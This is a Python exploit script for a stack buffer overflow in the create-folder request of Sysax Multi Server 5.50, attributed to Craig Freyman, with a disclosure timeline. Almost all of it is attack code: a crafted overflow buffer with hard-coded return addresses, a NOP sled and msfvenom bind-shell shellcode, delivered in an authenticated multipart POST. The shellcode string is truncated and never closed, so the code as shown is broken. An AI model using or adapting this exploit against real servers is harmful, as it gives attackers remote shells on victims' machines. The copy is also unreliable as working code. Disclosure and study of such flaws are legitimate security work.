
Sysax Multi Server 5.50 - Create Folder Buffer Overflow

Craig Freyman

#Title: Sysax Multi Server 5.50 Create Folder BOF
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Date Discovered: January 13, 2012
#Vendor Contacted: January 15, 2012
#Vendor Response: January 16, 2012
#Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
#Additional exploit details, notes and assumptions can be found here: (link not preserved in this copy of the advisory)

import socket,sys

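# --- Command-line handling ----------------------------------------------------
# Usage: <Target IP> <Port> <SID> <XP or 2K3>
#   SID is the 40-character session id of an existing web-UI session on the
#   target; it is spliced verbatim into the request URL below, so the overflow
#   is presumably only reachable with a valid (authenticated) session -- confirm
#   against the advisory.  The fourth argument selects the return-address set
#   used when the overflow buffer is built.
if len(sys.argv) != 5:
    print("[+] Usage: ./ <Target IP> <Port> <SID> <XP or 2K3>")
    # Stop here instead of falling through to an IndexError on sys.argv[1].
    sys.exit(1)
target = sys.argv[1]
try:
    port = int(sys.argv[2])
except ValueError:
    print("[X] Port must be an integer, got: " + sys.argv[2])
    sys.exit(1)
sid = sys.argv[3]
os = sys.argv[4]  # kept as "os": the layout selection below keys off this name

if len(sid) != 40:
    print("[X] Something is wrong with your SID, it should be 40 bytes long.")
    print("[X] Refer to")
    # A malformed SID can only produce a 4xx from the server, never a shell.
    sys.exit(1)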

#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "\x00"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shell = ("\xda\xdc\xd9\x74\x24\xf4\x5f\x2b\xc9\xb8\xb7\x6e\xc5\xe9" 

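#No DEP bypass :(
# --- Stack-smash layout -------------------------------------------------------
# Per target: filler bytes needed to reach the saved return address, the
# CALL ESP gadget that overwrites it, and the NOP sled length in front of the
# shellcode.  The gadget addresses are fixed kernel32.dll locations from the
# author's test boxes (XP SP3 / 2003 SP2 32-bit, per the header); they are
# build/service-pack specific and, being hard-coded, useless wherever ASLR or
# DEP is active -- re-verify them for any other target.
_LAYOUTS = {
    "2K3": (648, "\xDF\xF2\xE5\x77", 10),   # 77E5F2DF CALL ESP kernel32.dll
    "XP":  (667, "\xF0\x69\x83\x7C", 50),   # 7C8369F0 CALL ESP kernel32.dll
}

if os not in _LAYOUTS:
    # Previously an unknown OS string left `buf` undefined and the script died
    # with a NameError while building the request; fail explicitly instead.
    print("[X] Unknown target OS '" + os + "': use XP or 2K3")
    sys.exit(1)

junk_len, jump, sled_len = _LAYOUTS[os]
junk = "\x41" * junk_len
# filler -> overwritten RET (CALL ESP) -> NOP sled -> shellcode -> trailing pad
buf = junk + jump + "\x90" * sled_len + shell + "\x44" * 1000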

# Console banner.  Nothing has been sent yet; `target` is just echoed back.
banner = [
    "================================================",
    "[*] Sysax Multi Server 5.50 Create Folder BOF",
    "[*] ------------------by cd1zz------------------",
    "[*] Launching exploit against " + target + "....",
    "================================================",
]
for line in banner:
    print(line)

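# --- Request construction and delivery ----------------------------------------
# Multipart POST to the create-folder handler (pid=mk_folder2_name1.htm); the
# oversized "e2" field (the folder name) is what overflows the stack buffer.
# Header values are kept byte-for-byte as the author tested them.  Note the
# declared Content-Length of 171 is far smaller than the real body (buf alone
# is filler + RET + sled + shellcode + 1000 pad bytes), so the server evidently
# consumes the socket data regardless of the declared length.  NOTE(review):
# do not "fix" the length without re-testing -- the working exploit relies on
# the server's actual behaviour here, which this script does not document.
request_lines = [
    "POST /scgi?sid=" + sid + "&pid=mk_folder2_name1.htm HTTP/1.1",
    "Host: ",
    "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1",
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language: en-us,en;q=0.5",
    "Accept-Encoding: gzip, deflate",
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Proxy-Connection: keep-alive",
    "Referer: http://" + target + "/scgi?sid=" + sid + "&pid=mk_folder1_name1.htm",
    "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231",
    "Content-Length: 171",
    "",
    "-----------------------------1190753071675116720811342231",
    "Content-Disposition: form-data; name=\"e2\"",
    "",
    buf,
    "-----------------------------1190753071675116720811342231--",
    "",
]
head = "\r\n".join(request_lines) + "\r\n"

# Deliver the request.  The original listing lost its try/except framing
# (the "Meh! Fail!" line is the failure branch); it is restored here with a
# narrow except so a typo in the script is not reported as a network failure,
# sendall() so the ~2 KB body is not truncated by a short send(), and the
# socket is always closed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((target, port))
    s.sendall(head + "\r\n")
    print("[*] Payload sent!")
    print("[*] Go check your shell...")
except socket.error as exc:
    print("[X] Meh! Fail!")
    print("[X] " + str(exc))
finally:
    s.close()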